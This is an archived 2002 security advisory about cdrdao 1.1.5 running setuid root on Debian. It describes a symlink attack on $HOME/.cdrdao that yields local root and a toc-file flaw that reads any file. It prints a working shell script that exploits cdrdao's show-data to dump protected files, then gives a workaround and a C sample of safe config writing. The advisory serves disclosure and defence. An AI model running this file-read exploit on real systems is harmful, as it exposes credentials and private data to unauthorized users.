
Cdrdao local symlink attack leads to root access



15th Jan 2002 [SBWID-4999]
COMMAND

	Cdrdao local symlink attack leads to root access

SYSTEMS AFFECTED

	Cdrdao 1.1.5

PROBLEM

	Jens "atomi" Steube found :

	There is a symlink vulnerability in the $HOME/.cdrdao parsing of the
	program.
	

	Exploit : see shell script at the end of message

	=========

	Update : Exploit 2, read files, provided by Guillaume PELAT
	[http://www.intexxia.com]

	#!/bin/sh

	if [ "$1" ]; then
		# t.c turns the 16-bit sample values printed by show-data back into bytes
		cat > /tmp/t.c <<EOF
	#include <stdio.h>
	int     main()
	{
		int     i;
		while (fscanf(stdin, "%i", &i) > 0)
		{
			printf("%c%c", (i & 0xff00) >> 8, i & 0xff);
		}
		return 0;
	}
	EOF
		# a minimal TOC that names the requested file as track data
		cat > /tmp/t.toc <<EOF
	CD_ROM
	TRACK MODE1_RAW
	FILE "$1" 0
	EOF
		gcc /tmp/t.c -o /tmp/show
		echo `cdrdao show-data -v 0 --force /tmp/t.toc 2>&1 | grep -v WARNING | sed 's/.*://g' ` | /tmp/show
		rm -f /tmp/t.c /tmp/show /tmp/t.toc
	else
		echo "Syntax: $0 filename"
	fi

	

	

	

	--[ Description ]--

	There are several security-related bugs in the distributed
	Debian (SID) package of CDRDAO, a program to write audio or mixed
	mode CD-Rs in disk-at-once mode. /usr/bin/cdrdao is setuid root
	by default.


	--[ Version ]--

	Name: Cdrdao
	Version: 1.1.5
	Author: Andreas Mueller <andreas@daneb.de>


	--[ Impact ]--

	Local users can gain unauthorized root access to the system.


	--[ Legal ]--

	The information in this advisory may be distributed or
	reproduced, provided that the advisory is not modified in any way.
	The author makes no warranties of any kind to the information
	contained in this security advisory.


	--[ Bugs ]--

	Cdrdao doesn't check for permissions when it tries to open a file
	as its "toc-file". So it was possible to open all files on the
	system, but it skips the output in its error message. Maybe it is
	possible to trick it into reading all these files. As I tested around to
	trick it, I found another bug.

	This more important bug is that cdrdao can also write a
	config file which is written to "$HOME/.cdrdao". It is written by
	the root user and not as the user who starts cdrdao. It is possible
	to include data in the written config file and so it is possible to
	gain root via a symlink attack on $HOME/.cdrdao.

	After I found these bugs I stopped searching for more bugs.


	--[ Fix ]--

	Not tried to fix.

	The author, the Debian package maintainer and the Debian
	bug tracking system (#127930) were informed one week before
	this post, but there was no response.


	--[ Tested on ]--

	Debian GNU/Linux SID on i386, installed gcc and running cron


	--[ Credits ]--

	Found and exploited by Jens "atomi" Steube.

	Greets go out to: impulse, symbiont, mot, para, sharkking, kartan
	and all other friends on #altoetting and #perl.de on ircnet.


	--[ Proof of concept exploit ]--

	The attached exploit is designed for the Debian (SID) package
	and not tested on other systems.


	Regards,

	Jens Steube
	jsteube@lastflood.com

	

	

	Content-Type: application/octet-stream; name="cdrdaohack.sh"
	Content-Transfer-Encoding: base64
	Content-Disposition: attachment; filename="cdrdaohack.sh"

	

SOLUTION

	A workaround on Debian is to:

	dpkg-statoverride --update --add root root 0755 /usr/bin/cdrdao

	This tells dpkg that cdrdao is not to be suid root anymore, at least
	until you change or delete that override.
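	The workaround above removes the setuid bit; the underlying defect is a privileged write to a user-controlled path that follows symlinks. The C below is an added illustration (not cdrdao's code and not from the advisory): the vulnerable write pattern beside a hardened one that drops to the real user, opens with O_NOFOLLOW and checks ownership before truncating. The temp directory, the "target"/"dotcdrdao" names and all function names are constructed for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable pattern from the advisory: the setuid program writes
 * $HOME/.cdrdao with root's privileges, and fopen() follows the path. */
int write_config_unsafe(const char *path, const char *data) {
    FILE *f = fopen(path, "w");                     /* follows symlinks */
    return f && fputs(data, f) >= 0 && fclose(f) == 0 ? 0 : -1;
}

/* Hardened: write as the real (invoking) user, refuse symlinks with
 * O_NOFOLLOW, and only truncate a regular file that user owns. */
int write_config_safe(const char *path, const char *data) {
    uid_t real = getuid(), saved = geteuid();
    if (seteuid(real) != 0) return -1;              /* drop root for the write */
    int rc = -1, fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    struct stat st;
    if (fd >= 0 && fstat(fd, &st) == 0 && S_ISREG(st.st_mode)
        && st.st_uid == real && ftruncate(fd, 0) == 0)
        rc = write(fd, data, strlen(data)) == (ssize_t)strlen(data) ? 0 : -1;
    if (fd >= 0) close(fd);
    return seteuid(saved) == 0 ? rc : -1;           /* regain privilege, if any */
}

static int first_line_is(const char *path, const char *want) {
    char buf[32] = {0}; FILE *f = fopen(path, "r");
    if (f) { if (!fgets(buf, sizeof buf, f)) buf[0] = 0; fclose(f); }
    return strcmp(buf, want) == 0;
}

/* Constructed scenario in a temp dir: "target" stands in for the file an
 * attacker wants written, "dotcdrdao" is the planted symlink to it. Returns 1
 * when the safe writer refuses the link and the unsafe one follows it. */
int demo_symlink_case(void) {
    char dir[] = "/tmp/cdrdaoXXXXXX", target[64], lnk[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/dotcdrdao", dir);
    if (write_config_unsafe(target, "original\n") || symlink(target, lnk)) return 0;
    int ok = write_config_safe(lnk, "injected\n") == -1 && first_line_is(target, "original\n");
    ok = ok && write_config_unsafe(lnk, "injected\n") == 0 && first_line_is(target, "injected\n");
    unlink(lnk); unlink(target); rmdir(dir);
    return ok;
}
int main(void) { return printf("hardening holds: %d\n", demo_symlink_case()) < 0; }
```

	Run unprivileged, the open() on the symlink fails with ELOOP regardless of who the caller is, so the demonstration does not need a setuid binary; in a real setuid program the seteuid() dance is what keeps a non-symlink write from landing as root.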

